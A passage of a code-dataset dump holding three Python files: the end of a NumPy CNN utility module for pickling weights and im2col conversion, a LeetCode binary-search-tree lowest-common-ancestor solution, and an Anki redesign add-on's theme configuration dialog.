y[t:t+BATCH_SIZE, ...]\n \n\n\ndef save_params_to_file(model):\n \"\"\"\n Saves model parameters to a file.\n\n Parameters:\n -model: a CNN architecture.\n \"\"\"\n # Make save_weights/ accessible from every folders.\n terminal_path = [\"/content/drive/My Drive/Colab Notebooks/Fruit/src/fast/save_weights/\",\"src/fast/save_weights/\", \"fast/save_weights/\", '../fast/save_weights/', \"save_weights/\", \"../save_weights/\"]\n dirPath = None\n for path in terminal_path:\n if os.path.isdir(path):\n dirPath = path\n if dirPath == None:\n raise FileNotFoundError(\"save_params_to_file(): Impossible to find save_weights/ from current folder. You need to manually add the path to it in the \\'terminal_path\\' list and the run the function again.\")\n\n weights = model.get_params()\n if dirPath == '/content/drive/My Drive/Colab Notebooks/Fruit/src/fast/save_weights/': # We run the code from demo notebook.\n with open(dirPath + \"demo_weights.pkl\",\"wb\") as f:\n pickle.dump(weights, f)\n else:\n with open(dirPath + \"final_weights.pkl\",\"wb\") as f:\n pickle.dump(weights, f)\n\ndef load_params_from_file(model, isNotebook=False):\n \"\"\"\n Loads model parameters from a file.\n\n Parameters:\n -model: a CNN architecture.\n \"\"\"\n if isNotebook: # We run from demo-notebooks/\n pickle_in = open(\"/content/drive/My Drive/Colab Notebooks/Fruit/src/fast/save_weights/demo_weights.pkl\", 'rb')\n params = pickle.load(pickle_in)\n model.set_params(params)\n else:\n # Make final_weights.pkl file accessible from every folders.\n terminal_path = [\"/content/drive/My Drive/Colab Notebooks/Fruit/src/fast/save_weights/final_weights.pkl\",\"src/fast/save_weights/final_weights.pkl\", \"fast/save_weights/final_weights.pkl\",\n \"save_weights/final_weights.pkl\", \"../save_weights/final_weights.pkl\"]\n\n filePath = None\n for path in terminal_path:\n if os.path.isfile(path):\n filePath = path\n if filePath == None:\n raise FileNotFoundError('load_params_from_file(): Cannot find final_weights.pkl from your current folder. You need to manually add it to terminal_path list and the run the function again.')\n\n pickle_in = open(filePath, 'rb')\n params = pickle.load(pickle_in)\n model.set_params(params)\n return model\n \ndef prettyPrint3D(M):\n \"\"\"\n Displays a 3D matrix in a pretty way.\n\n Parameters:\n -M: Matrix of shape (m, n_H, n_W, n_C) with m, the number 3D matrices.\n \"\"\"\n m, n_C, n_H, n_W = M.shape\n\n for i in range(m):\n \n for c in range(n_C):\n print('Image {}, channel {}'.format(i + 1, c + 1), end='\\n\\n') \n\n for h in range(n_H):\n print(\"/\", end=\"\")\n\n for j in range(n_W):\n\n print(M[i, c, h, j], end = \",\")\n\n print(\"/\", end='\\n\\n')\n \n print('-------------------', end='\\n\\n')\n\n\ndef get_indices(X_shape, HF, WF, stride, pad):\n \"\"\"\n Returns index matrices in order to transform our input image into a matrix.\n\n Parameters:\n -X_shape: Input image shape.\n -HF: filter height.\n -WF: filter width.\n -stride: stride value.\n -pad: padding value.\n\n Returns:\n -i: matrix of index i.\n -j: matrix of index j.\n -d: matrix of index d. \n (Use to mark delimitation for each channel\n during multi-dimensional arrays indexing).\n \"\"\"\n # get input size\n m, n_C, n_H, n_W = X_shape\n\n # get output size\n out_h = int((n_H + 2 * pad - HF) / stride) + 1\n out_w = int((n_W + 2 * pad - WF) / stride) + 1\n \n # ----Compute matrix of index i----\n\n # Level 1 vector.\n level1 = np.repeat(np.arange(HF), WF)\n # Duplicate for the other channels.\n level1 = np.tile(level1, n_C)\n # Create a vector with an increase by 1 at each level.\n everyLevels = stride * np.repeat(np.arange(out_h), out_w)\n # Create matrix of index i at every levels for each channel.\n i = level1.reshape(-1, 1) + everyLevels.reshape(1, -1)\n\n # ----Compute matrix of index j----\n \n # Slide 1 vector.\n slide1 = np.tile(np.arange(WF), HF)\n # Duplicate for the other channels.\n slide1 = np.tile(slide1, n_C)\n # Create a vector with an increase by 1 at each slide.\n everySlides = stride * np.tile(np.arange(out_w), out_h)\n # Create matrix of index j at every slides for each channel.\n j = slide1.reshape(-1, 1) + everySlides.reshape(1, -1)\n\n # ----Compute matrix of index d----\n\n # This is to mark delimitation for each channel\n # during multi-dimensional arrays indexing.\n d = np.repeat(np.arange(n_C), HF * WF).reshape(-1, 1)\n\n return i, j, d\n\ndef im2col(X, HF, WF, stride, pad):\n \"\"\"\n Transforms our input image into a matrix.\n\n Parameters:\n - X: input image.\n - HF: filter height.\n - WF: filter width.\n - stride: stride value.\n - pad: padding value.\n\n Returns:\n -cols: output matrix.\n \"\"\"\n # Padding\n X_padded = np.pad(X, ((0,0), (0,0), (pad, pad), (pad, pad)), mode='constant')\n i, j, d = get_indices(X.shape, HF, WF, stride, pad)\n # Multi-dimensional arrays indexing.\n cols = X_padded[:, d, i, j]\n cols = np.concatenate(cols, axis=-1)\n return cols\n\ndef col2im(dX_col, X_shape, HF, WF, stride, pad):\n \"\"\"\n Transform our matrix back to the input image.\n\n Parameters:\n - dX_col: matrix with error.\n - X_shape: input image shape.\n - HF: filter height.\n - WF: filter width.\n - stride: stride value.\n - pad: padding value.\n\n Returns:\n -x_padded: input image with error.\n \"\"\"\n # Get input size\n N, D, H, W = X_shape\n # Add padding if needed.\n H_padded, W_padded = H + 2 * pad, W + 2 * pad\n X_padded = np.zeros((N, D, H_padded, W_padded))\n \n # Index matrices, necessary to transform our input image into a matrix. \n i, j, d = get_indices(X_shape, HF, WF, stride, pad)\n # Retrieve batch dimension by spliting dX_col N times: (X, Y) => (N, X, Y)\n dX_col_reshaped = np.array(np.hsplit(dX_col, N))\n # Reshape our matrix back to image.\n # slice(None) is used to produce the [::] effect which means \"for every elements\".\n np.add.at(X_padded, (slice(None), d, i, j), dX_col_reshaped)\n # Remove padding from new image if needed.\n if pad == 0:\n return X_padded\n elif type(pad) is int:\n return X_padded[pad:-pad, pad:-pad, :, :]\n","repo_name":"jerryold/NTHU_Deeplearning_homework","sub_path":"hw3_109064518_高聖哲/hw3_109064518/Fruit/src/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":7095,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"1803439851","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution:\n def lowestCommonAncestor(self, root: 'TreeNode', p: 'TreeNode', q: 'TreeNode') -> 'TreeNode':\n while root != None:\n if(p.val < root.val and q.val < root.val):\n root = root.left\n elif(p.val > root.val and q.val > root.val):\n root = root.right\n elif(p.val < root.val and q.val > root.val) or (p.val > root.val and q.val < root.val):\n return root\n elif((p.val == root.val) and (q.val > root.val)) or ((p.val == root.val) and (q.val < root.val)):\n return p\n elif(q.val == root.val and p.val > root.val) or (q.val == root.val and p.val < root.val):\n return q \n\n################################################################################\n# Task:\n# Given a binary search tree (BST), find the lowest common ancestor (LCA) of two given nodes in the BST.\n# According to the definition of LCA on Wikipedia: “The lowest common ancestor is defined between two nodes p and q as the lowest node in T that has both p and q as descendants (where we allow a node to be a descendant of itself).”\n\n################################################################################\n# (Solution developed with help from GeeksforGeeks)\n# Time: Unknown, definitely more than 30 minutes. \n# What can I learn here?\n# Don't always need to use recursion to traverse BST\n# If comparing nodes to BST, check if values are greater or less than BST, and traverse like that.\n","repo_name":"1230fahid/DS-A","sub_path":"BST/lc/235.py","file_name":"235.py","file_ext":"py","file_size_in_byte":1675,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"17197155904","text":"import json\nfrom aqt import mw, gui_hooks, appVersion\nfrom aqt.qt import *\nfrom .modules import *\nfrom .translation import get_texts\nfrom ..config import config, write_config, get_config\nfrom aqt.utils import showInfo\nfrom aqt.webview import AnkiWebView\nfrom .logger import logger\nfrom aqt.theme import theme_manager, colors\nfrom ..injections.toolbar import redraw_toolbar, redraw_toolbar_legacy\nfrom .themes import system_themes, themes, write_theme, get_theme, sync_theme, clone_theme, delete_theme\nif module_has_attribute(\"anki.lang\", \"current_lang\"):\n from anki.lang import current_lang, lang_to_disk_lang, compatMap\nelse:\n from anki.lang import currentLang as current_lang, lang_to_disk_lang, compatMap\nfrom .dark_title_bar import set_dark_titlebar_qt, dwmapi\nanki_version = tuple(int(segment) for segment in appVersion.split(\".\"))\n\ntheme = config['theme']\nthemes_parsed = get_theme(theme)\ncolor_mode = 3 if theme_manager.get_night_mode() else 2 # 1 = light and 2 = dark\n\ndef get_anki_lang():\n lang = lang_to_disk_lang(current_lang)\n if lang in compatMap:\n lang = compatMap[lang]\n lang = lang.replace(\"-\", \"_\")\n return lang\n\nclass AnkiRedesignThemeEditor(QDialog):\n def __init__(self, parent, *args, **kwargs):\n super().__init__(parent=parent or mw, *args, **kwargs)\n self.config_editor = parent\n self.texts = get_texts(get_anki_lang())\n self.setWindowModality(Qt.ApplicationModal)\n self.setWindowTitle(self.texts[\"theme_editor_window_title\"])\n self.setSizePolicy(self.make_size_policy())\n self.setMinimumSize(420, 420)\n self.setAttribute(Qt.WidgetAttribute.WA_DeleteOnClose)\n set_dark_titlebar_qt(self, dwmapi, fix=False)\n # Root layout\n self.root_layout = QVBoxLayout(self)\n # Main layout\n self.layout = QVBoxLayout()\n self.textedit = QTextEdit()\n themes_plaintext = open(themes[theme], encoding='utf-8').read()\n self.textedit.setPlainText(themes_plaintext)\n self.layout.addWidget(self.textedit)\n self.root_layout.addLayout(self.layout)\n self.root_layout.addLayout(self.make_button_box())\n\n def save_edit(self) -> None:\n themes_parsed = json.loads(self.textedit.toPlainText())\n write_theme(themes[theme], themes_parsed)\n self.config_editor.update()\n self.accept()\n\n def make_button_box(self) -> QWidget:\n def cancel():\n button = QPushButton(self.texts[\"cancel_button\"])\n button.setCursor(QCursor(Qt.CursorShape.PointingHandCursor))\n qconnect(button.clicked, self.accept)\n return button\n\n def save():\n button = QPushButton(self.texts[\"save_button\"])\n button.setCursor(QCursor(Qt.CursorShape.PointingHandCursor))\n button.setDefault(True)\n button.setShortcut(\"Ctrl+Return\")\n button.clicked.connect(lambda _: self.save_edit())\n return button\n\n button_box = QHBoxLayout()\n button_box.addStretch()\n button_box.addWidget(cancel())\n button_box.addWidget(save())\n return button_box\n\n def make_size_policy(self) -> QSizePolicy:\n size_policy = QSizePolicy(QSizePolicy.Preferred, QSizePolicy.Minimum)\n size_policy.setHorizontalStretch(0)\n size_policy.setVerticalStretch(0)\n size_policy.setHeightForWidth(self.sizePolicy().hasHeightForWidth())\n return size_policy\n\nclass AnkiRedesignConfigDialog(QDialog):\n def __init__(self, parent: QWidget, *args, **kwargs):\n super().__init__(parent=parent or mw, *args, **kwargs)\n self.texts = get_texts(get_anki_lang())\n self.setWindowModality(Qt.ApplicationModal)\n self.setWindowTitle(self.texts[\"configuration_window_title\"])\n self.setSizePolicy(self.make_size_policy())\n self.setMinimumSize(420, 580)\n self.setAttribute(Qt.WidgetAttribute.WA_DeleteOnClose)\n set_dark_titlebar_qt(self, dwmapi, fix=False)\n\n # Color/theme\n # Loads theme color\n self.theme_colors = themes_parsed.get(\"colors\")\n self.updates = []\n self.theme_general = [\"TEXT_FG\", \"WINDOW_BG\", \"FRAME_BG\", \"BUTTON_BG\", \"BUTTON_FOCUS_BG\", \"TOOLTIP_BG\", \"BORDER\", \"MEDIUM_BORDER\", \"FAINT_BORDER\", \"HIGHLIGHT_BG\", \"HIGHLIGHT_FG\" , \"LINK\", \"DISABLED\", \"SLIGHTLY_GREY_TEXT\", \"FOCUS_SHADOW\"]\n self.theme_decks = [\"CURRENT_DECK\", \"NEW_COUNT\", \"LEARN_COUNT\", \"REVIEW_COUNT\", \"ZERO_COUNT\"]\n self.theme_browse = [\"BURIED_FG\", \"SUSPENDED_FG\", \"MARKED_BG\", \"FLAG1_BG\", \"FLAG1_FG\", \"FLAG2_BG\", \"FLAG2_FG\", \"FLAG3_BG\", \"FLAG3_FG\", \"FLAG4_BG\", \"FLAG4_FG\", \"FLAG5_BG\", \"FLAG5_FG\", \"FLAG6_BG\", \"FLAG6_FG\", \"FLAG7_BG\", \"FLAG7_FG\"]\n self.theme_extra = []\n if anki_version >= (2, 1, 56):\n self.theme_general = ['FG', 'FG_DISABLED', 'FG_FAINT', 'FG_LINK', 'FG_SUBTLE'] + ['CANVAS', 'CANVAS_CODE', 'CANVAS_ELEVATED', 'CANVAS_INSET', 'CANVAS_OVERLAY']\n self.theme_decks = ['BORDER', 'BORDER_FOCUS', 'BORDER_STRONG', 'BORDER_SUBTLE'] + ['BUTTON_BG', 'BUTTON_DISABLED', 'BUTTON_GRADIENT_END', 'BUTTON_GRADIENT_START', 'BUTTON_HOVER_BORDER', 'BUTTON_PRIMARY_BG', 'BUTTON_PRIMARY_DISABLED', 'BUTTON_PRIMARY_GRADIENT_END', 'BUTTON_PRIMARY_GRADIENT_START']\n self.theme_browse = ['ACCENT_CARD', 'ACCENT_DANGER', 'ACCENT_NOTE'] + ['STATE_BURIED', 'STATE_LEARN', 'STATE_MARKED', 'STATE_NEW', 'STATE_REVIEW', 'STATE_SUSPENDED'] + ['FLAG_1', 'FLAG_2', 'FLAG_3', 'FLAG_4', 'FLAG_5', 'FLAG_6', 'FLAG_7']\n self.theme_extra = ['SCROLLBAR_BG', 'SCROLLBAR_BG_ACTIVE', 'SCROLLBAR_BG_HOVER'] + ['HIGHLIGHT_BG', 'HIGHLIGHT_FG'] + ['SELECTED_BG', 'SELECTED_FG'] + ['SHADOW', 'SHADOW_FOCUS', 'SHADOW_INSET', 'SHADOW_SUBTLE']\n\n # Root layout\n self.root_layout = QVBoxLayout(self)\n # Main layout\n self.layout = QVBoxLayout()\n # Initialize tab screen\n self.tabs = QTabWidget(objectName=\"tabs\")\n self.tabs.setFocusPolicy(Qt.FocusPolicy.StrongFocus)\n self.tab_general = QWidget(objectName=\"general\")\n self.tab_general.setLayout(\n self.create_color_picker_layout(self.theme_general))\n self.tab_decks = QWidget(objectName=\"decks\")\n self.tab_decks.setLayout(\n self.create_color_picker_layout(self.theme_decks))\n self.tab_browse = QWidget(objectName=\"browse\")\n self.tab_browse.setLayout(\n self.create_color_picker_layout(self.theme_browse))\n self.tab_extra = QWidget(objectName=\"extra\")\n self.tab_extra.setLayout(\n self.create_color_picker_layout(self.theme_extra))\n\n self.tab_settings = QWidget(objectName=\"settings\")\n self.settings_layout = QFormLayout()\n self.theme_label = QLabel(self.texts[\"theme_label\"])\n self.theme_label.setStyleSheet(\n 'QLabel { font-size: 14px; font-weight: bold }')\n self.settings_layout.addRow(self.theme_label)\n for key in themes:\n self.radio = self.theme_button(key, not key in system_themes)\n self.settings_layout.addRow(key, self.radio)\n self.settings_layout.addRow(QLabel())\n\n self.font_label = QLabel(self.texts[\"font_label\"])\n self.font_label.setStyleSheet(\n 'QLabel { font-size: 14px; font-weight: bold }')\n self.settings_layout.addRow(self.font_label)\n self.interface_font = QFontComboBox()\n self.interface_font.setFixedWidth(200)\n self.interface_font.setCurrentFont(QFont(config[\"font\"]))\n self.settings_layout.addRow(self.interface_font)\n\n self.font_size = QSpinBox()\n self.font_size.setFixedWidth(200)\n self.font_size.setValue(config[\"font_size\"])\n self.font_size.setSuffix(\"px\")\n self.settings_layout.addRow(self.font_size)\n self.settings_layout.addRow(QLabel())\n\n self.fix_label = QLabel(self.texts[\"addon_compatibility_fix_label\"])\n self.fix_label.setStyleSheet(\n 'QLabel { font-size: 14px; font-weight: bold }')\n self.settings_layout.addRow(self.fix_label)\n self.addon_more_overview_stats_check = self.checkbox(\n \"addon_more_overview_stats\")\n self.settings_layout.addRow(\n \"More Overview Stats 21\", self.addon_more_overview_stats_check)\n self.addon_advanced_review_bottom_bar_check = self.checkbox(\n \"addon_advanced_review_bottom_bar\")\n self.settings_layout.addRow(\n \"Advanced Review Bottom Bar\", self.addon_advanced_review_bottom_bar_check)\n self.addon_no_distractions_full_screen_check = self.checkbox(\n \"addon_no_distractions_full_screen\")\n self.settings_layout.addRow(\n \"No Distractions Full Screen\", self.addon_no_distractions_full_screen_check)\n\n self.tab_settings.setLayout(self.settings_layout)\n\n # Add tabs\n self.tabs.resize(300, 200)\n self.tabs.addTab(self.tab_settings, self.texts[\"settings_tab\"])\n self.tabs.addTab(self.tab_general, self.texts[\"general_tab\"])\n self.tabs.addTab(self.tab_decks, self.texts[\"decks_tab\"])\n self.tabs.addTab(self.tab_browse, self.texts[\"browse_tab\"])\n self.tabs.addTab(self.tab_extra, \"Extra\")\n # Add tabs to widget\n self.layout.addWidget(self.tabs)\n\n self.root_layout.addLayout(self.layout)\n self.root_layout.addLayout(self.make_button_box())\n self.setLayout(self.root_layout)\n self.show()\n\n def update(self) -> None:\n global themes_parsed\n themes_parsed = get_theme(theme)\n self.theme_colors = themes_parsed.get(\"colors\")\n for update in self.updates:\n update()\n\n def checkbox(self, key: str) -> QCheckBox:\n checkbox = QCheckBox()\n\n def update() -> None:\n value = config[key]\n checkbox.setChecked(value)\n\n self.updates.append(update)\n update()\n return checkbox\n\n def theme_button(self, key: str, custom=False):\n layout = QGridLayout()\n radio = self.radio_button(key)\n clone_button = QPushButton(self.texts[\"clone_button\"])\n clone_button.setCursor(QCursor(Qt.CursorShape.PointingHandCursor))\n clone_button.clicked.connect(lambda _: self.clone_theme(key))\n layout.addWidget(radio, 0, 0)\n if custom:\n delete_button = QPushButton(self.texts[\"delete_button\"])\n delete_button.setCursor(QCursor(Qt.CursorShape.PointingHandCursor))\n delete_button.clicked.connect(lambda _: self.delete_theme(key))\n layout.addWidget(delete_button, 0, 1)\n else:\n sync_button = QPushButton(self.texts[\"sync_button\"])\n sync_button.setCursor(QCursor(Qt.CursorShape.PointingHandCursor))\n sync_button.clicked.connect(lambda _: self.sync_theme(key))\n layout.addWidget(sync_button, 0, 1)\n layout.addWidget(clone_button, 0, 2)\n layout.addWidget(QLabel(), 0, 3)\n layout.addWidget(QLabel(), 0, 4)\n return layout\n\n def clone_theme(self, key):\n global themes\n logger.debug(\"Clone: \" + key)\n popup = QMessageBox()\n popup.setIcon(QMessageBox.Information)\n popup.setText(self.texts[\"clone_message\"] % key)\n popup.setWindowTitle(self.texts[\"clone_window_title\"] % key)\n popup.setStandardButtons(QMessageBox.Yes | QMessageBox.No)\n if popup.exec() == QMessageBox.Yes:\n showInfo(_(self.texts[\"clone_success_message\"] % key))\n themes = clone_theme(key, themes)\n self.restart()\n\n def delete_theme(self, key):\n global themes\n logger.debug(\"Delete: \" + key)\n popup = QMessageBox()\n popup.setIcon(QMessageBox.Information)\n popup.setText(self.texts[\"delete_message\"] % key)\n popup.setWindowTitle(self.texts[\"delete_window_title\"] % key)\n popup.setStandardButtons(QMessageBox.Yes | QMessageBox.No)\n if popup.exec() == QMessageBox.Yes:\n showInfo(_(self.texts[\"delete_success_message\"] % key))\n themes = delete_theme(key, themes)\n self.restart()\n\n def sync_theme(self, key):\n global themes\n logger.debug(\"Sync: \" + key)\n popup = QMessageBox()\n popup.setIcon(QMessageBox.Information)\n popup.setText(self.texts[\"sync_message\"] % key)\n popup.setWindowTitle(self.texts[\"sync_window_title\"] % key)\n popup.setStandardButtons(QMessageBox.Yes | QMessageBox.No)\n if popup.exec() == QMessageBox.Yes:\n showInfo(_(self.texts[\"sync_success_message\"] % key))\n themes = sync_theme(key, themes)\n self.restart()\n\n def restart(self):\n # Close window\n self.accept()\n self.close()\n # Open window again\n mw.anki_redesign_cache = AnkiRedesignConfigDialog(mw)\n mw.anki_redesign_cache.exec()\n\n def radio_button(self, key: str) -> QRadioButton:\n radio = QRadioButton()\n\n def update() -> None:\n if theme == key:\n radio.setChecked(True)\n elif radio.isChecked():\n radio.setChecked(False)\n\n def toggle(checked) -> None:\n global theme\n if checked:\n theme = key\n self.update()\n\n self.updates.append(update)\n radio.toggled.connect(lambda checked: toggle(checked))\n update()\n return radio\n\n def color_input(self, key: str) -> QPushButton:\n button = QPushButton()\n button.setCursor(QCursor(Qt.CursorShape.PointingHandCursor))\n button.setFixedWidth(25)\n button.setFixedHeight(25)\n button.setToolTip(self.theme_colors.get(key)[1])\n\n color_dialog = QColorDialog(self)\n\n def set_color(rgb: str) -> None:\n # Check for valid color\n color = QColor()\n color.setNamedColor(rgb)\n if not color.isValid():\n return\n # Update color\n color_dialog.setCurrentColor(color)\n button.setStyleSheet(\n 'QPushButton{ background-color: \"%s\"; border: none; border-radius: 2px}' % rgb)\n\n def update() -> None:\n # TODO: fix this\n try:\n rgb = self.theme_colors.get(key)[color_mode]\n except:\n rgb = \"#ff0000\"\n set_color(rgb)\n\n def save(color: QColor) -> None:\n rgb = color.name(QColor.NameFormat.HexRgb)\n self.theme_colors[key][color_mode] = rgb\n set_color(rgb)\n\n self.updates.append(update)\n color_dialog.colorSelected.connect(lambda color: save(color))\n button.clicked.connect(lambda _: color_dialog.exec())\n return button\n\n def create_color_picker_layout(self, colors) -> None:\n layout = QFormLayout()\n for key in colors:\n layout.addRow(self.theme_colors.get(key)[0], self.color_input(key))\n return layout\n\n def theme_file_editor(self) -> None:\n diag = AnkiRedesignThemeEditor(self)\n diag.show()\n\n def make_button_box(self) -> QWidget:\n def advanced():\n button = QPushButton(self.texts[\"advanced_button\"])\n button.setCursor(QCursor(Qt.CursorShape.PointingHandCursor))\n qconnect(button.clicked, self.theme_file_editor)\n return button\n\n def cancel():\n button = QPushButton(self.texts[\"cancel_button\"])\n button.setCursor(QCursor(Qt.CursorShape.PointingHandCursor))\n qconnect(button.clicked, self.accept)\n return button\n\n def save():\n button = QPushButton(self.texts[\"save_button\"])\n button.setCursor(QCursor(Qt.CursorShape.PointingHandCursor))\n button.setDefault(True)\n button.setShortcut(\"Ctrl+Return\")\n button.clicked.connect(lambda _: self.save())\n return button\n\n button_box = QHBoxLayout()\n button_box.addWidget(advanced())\n button_box.addStretch()\n button_box.addWidget(cancel())\n button_box.addWidget(save())\n return button_box\n\n def make_size_policy(self) -> QSizePolicy:\n size_policy = QSizePolicy(QSizePolicy.Preferred, QSizePolicy.Minimum)\n size_policy.setHorizontalStretch(0)\n size_policy.setVerticalStretch(0)\n size_policy.setHeightForWidth(self.sizePolicy().hasHeightForWidth())\n return size_policy\n\n def save(self) -> None:\n # Save settings and update config\n global config, color_mode\n config[\"font\"] = self.interface_font.currentFont().family()\n config[\"font_size\"] = self.font_size.value()\n config['addon_more_overview_stats'] = self.addon_more_overview_stats_check.isChecked()\n config['addon_advanced_review_bottom_bar'] = self.addon_advanced_review_bottom_bar_check.isChecked()\n config['addon_no_distractions_full_screen'] = self.addon_no_distractions_full_screen_check.isChecked()\n config[\"theme\"] = theme\n write_config(config)\n config = get_config()\n logger.debug(config)\n\n # Write and update theme\n color_mode = 3 if theme_manager.get_night_mode() else 2 # 2 = light and 3 = dark\n themes_parsed[\"colors\"] = self.theme_colors\n write_theme(themes[theme], themes_parsed)\n update_theme()\n\n # ShowInfo for both new and legacy support\n showInfo(_(self.texts[\"changes_message\"]))\n self.accept()\n\n\ndef check_legacy_colors() -> None:\n try:\n _ = colors.items()\n except:\n return False\n return True\n\n\ndef refresh_all_windows() -> None:\n # Redraw top toolbar\n mw.toolbar.draw()\n if attribute_exists(gui_hooks, \"top_toolbar_did_init_links\"):\n gui_hooks.top_toolbar_did_init_links.append(lambda a, b: [redraw_toolbar_legacy(a, b), gui_hooks.top_toolbar_did_init_links.remove(print)])\n\n # Redraw main body\n if mw.state == \"review\":\n mw.reviewer._initWeb()\n # Legacy check\n if getattr(mw.reviewer, \"_redraw_current_card\", False):\n mw.reviewer._redraw_current_card()\n mw.fade_in_webview()\n elif mw.state == \"overview\":\n mw.overview.refresh()\n elif mw.state == \"deckBrowser\":\n mw.deckBrowser.show()\n\n # Redraw toolbar\n if attribute_exists(gui_hooks, \"top_toolbar_did_init_links\"):\n gui_hooks.top_toolbar_did_init_links.remove(redraw_toolbar)\n\n\ndef update_theme() -> None:\n themes_parsed = get_theme(theme)\n theme_colors = themes_parsed.get(\"colors\")\n light = 2\n dark = 3\n color_mode = dark if theme_manager.get_night_mode() else light\n # Apply theme on colors\n ncolors = {}\n # Legacy color check\n # logger.debug(dir(colors))\n legacy = check_legacy_colors()\n for color_name in theme_colors:\n c = theme_colors.get(color_name)\n ncolors[color_name] = c[color_mode]\n if legacy:\n colors[f\"day{c[3].replace('--','-')}\"] = c[light]\n colors[f\"night{c[3].replace('--','-')}\"] = c[dark]\n else:\n if getattr(colors, color_name, False):\n if anki_version >= (2, 1, 56):\n setattr(colors, color_name, {\"light\": c[light], \"dark\": c[dark]})\n else:\n setattr(colors, color_name, (c[light], c[dark]))\n # Apply theme on palette\n apply_theme(ncolors)\n gui_hooks.debug_console_will_show(mw)\n refresh_all_windows()\n\n\ndef apply_theme(colors) -> None:\n # Reset style and palette\n logger.debug(colors)\n if getattr(theme_manager, \"_default_style\", False):\n mw.app.setStyle(QStyleFactory.create(theme_manager._default_style))\n if getattr(theme_manager, \"default_palette\", False):\n mw.app.setPalette(theme_manager.default_palette)\n else:\n theme_manager._apply_palette(mw.app)\n # Load and apply palette\n palette = QPalette()\n # Update palette\n if anki_version >= (2, 1, 56):\n text = QColor(colors[\"FG\"])\n palette.setColor(QPalette.ColorRole.WindowText, text)\n palette.setColor(QPalette.ColorRole.ToolTipText, text)\n palette.setColor(QPalette.ColorRole.Text, text)\n palette.setColor(QPalette.ColorRole.ButtonText, text)\n\n hlbg = QColor(colors[\"HIGHLIGHT_BG\"])\n palette.setColor(QPalette.ColorRole.HighlightedText, QColor(colors[\"HIGHLIGHT_FG\"]))\n palette.setColor(QPalette.ColorRole.Highlight, hlbg)\n\n canvas = QColor(colors[\"CANVAS\"])\n palette.setColor(QPalette.ColorRole.Window, canvas)\n palette.setColor(QPalette.ColorRole.AlternateBase, canvas)\n\n palette.setColor(QPalette.ColorRole.Button, QColor(colors[\"BUTTON_BG\"]))\n\n input_base = QColor(colors[\"CANVAS_CODE\"])\n palette.setColor(QPalette.ColorRole.Base, input_base)\n palette.setColor(QPalette.ColorRole.ToolTipBase, input_base)\n\n palette.setColor(QPalette.ColorRole.PlaceholderText, QColor(colors[\"FG_SUBTLE\"]))\n\n disabled_color = QColor(colors[\"FG_DISABLED\"])\n palette.setColor(QPalette.ColorGroup.Disabled, QPalette.ColorRole.Text, disabled_color)\n palette.setColor(QPalette.ColorGroup.Disabled, QPalette.ColorRole.ButtonText, disabled_color)\n palette.setColor(QPalette.ColorGroup.Disabled, QPalette.ColorRole.HighlightedText, disabled_color)\n palette.setColor(QPalette.ColorRole.Link, QColor(colors[\"FG_LINK\"]))\n palette.setColor(QPalette.ColorRole.BrightText, Qt.GlobalColor.red)\n\n # Update webview background\n AnkiWebView._getWindowColor = lambda *args: QColor(colors[\"CANVAS\"])\n AnkiWebView.get_window_bg_color = lambda *args: QColor(colors[\"CANVAS\"])\n\n theme_manager._apply_palette(mw.app) # Update palette theme_manager\n mw.app.setPalette(palette) # Overwrite palette\n theme_manager._apply_style(mw.app) # Update stylesheet theme_manager\n else:\n # QT mappings\n color_map = {\n QPalette.ColorRole.Window: \"WINDOW_BG\",\n QPalette.ColorRole.WindowText: \"TEXT_FG\",\n QPalette.ColorRole.Base: \"FRAME_BG\",\n QPalette.ColorRole.AlternateBase: \"WINDOW_BG\",\n QPalette.ColorRole.ToolTipBase: \"TOOLTIP_BG\",\n QPalette.ColorRole.ToolTipText: \"TEXT_FG\",\n QPalette.ColorRole.Text: \"TEXT_FG\",\n QPalette.ColorRole.Button: \"BUTTON_BG\",\n QPalette.ColorRole.ButtonText: \"TEXT_FG\",\n QPalette.ColorRole.BrightText: \"HIGHLIGHT_FG\",\n QPalette.ColorRole.HighlightedText: \"HIGHLIGHT_FG\",\n QPalette.ColorRole.Link: \"LINK\",\n QPalette.ColorRole.NoRole: \"WINDOW_BG\",\n }\n for color_role in color_map:\n palette.setColor(color_role, QColor(colors[color_map[color_role]]))\n\n highlight_bg = QColor(colors[\"HIGHLIGHT_BG\"])\n highlight_bg.setAlpha(64)\n palette.setColor(QPalette.ColorRole.Highlight, highlight_bg)\n\n disabled_color = QColor(colors[\"DISABLED\"])\n palette.setColor(QPalette.ColorRole.PlaceholderText, disabled_color)\n palette.setColor(QPalette.ColorGroup.Disabled, QPalette.ColorRole.Text, disabled_color)\n palette.setColor(QPalette.ColorGroup.Disabled, QPalette.ColorRole.ButtonText, disabled_color)\n palette.setColor(QPalette.ColorGroup.Disabled, QPalette.ColorRole.HighlightedText, disabled_color)\n\n # Update webview background\n AnkiWebView._getWindowColor = lambda *args: QColor(colors[\"WINDOW_BG\"])\n AnkiWebView.get_window_bg_color = lambda *args: QColor(colors[\"WINDOW_BG\"])\n\n theme_manager._apply_palette(mw.app) # Update palette theme_manager\n mw.app.setPalette(palette) # Overwrite palette\n theme_manager._apply_style(mw.app) # Update stylesheet theme_manager\n\n\ndef create_menu_action(parent: QWidget, dialog_class: QDialog, dialog_name: str) -> QAction:\n def open_dialog():\n dialog = dialog_class(mw)\n return dialog.exec()\n\n action = QAction(dialog_name, parent)\n action.triggered.connect(open_dialog)\n return action\n\n\n# Load in the Anki-redesign menu\nif not hasattr(mw, 'anki_redesign'):\n mw.form.menuTools.addAction(create_menu_action(mw, AnkiRedesignConfigDialog, \"&Anki-redesign\"))\n # Update and apply theme\n mw.reset()\n update_theme()\n # Rereload view to fix the QT6 header size on startup\n if 'Qt6' in QPalette.ColorRole.__module__:\n logger.debug('QT6 detected...')\n mw.reset()\n update_theme()\n\n\ndef on_theme_did_change() -> None:\n global color_mode\n color_mode = 3 if theme_manager.get_night_mode() else 2 # 2 = light and 3 = dark\n logger.debug(\"Theme changed\")\n mw.reset()\n update_theme()\n\n\nif attribute_exists(gui_hooks, \"theme_did_change\"):\n 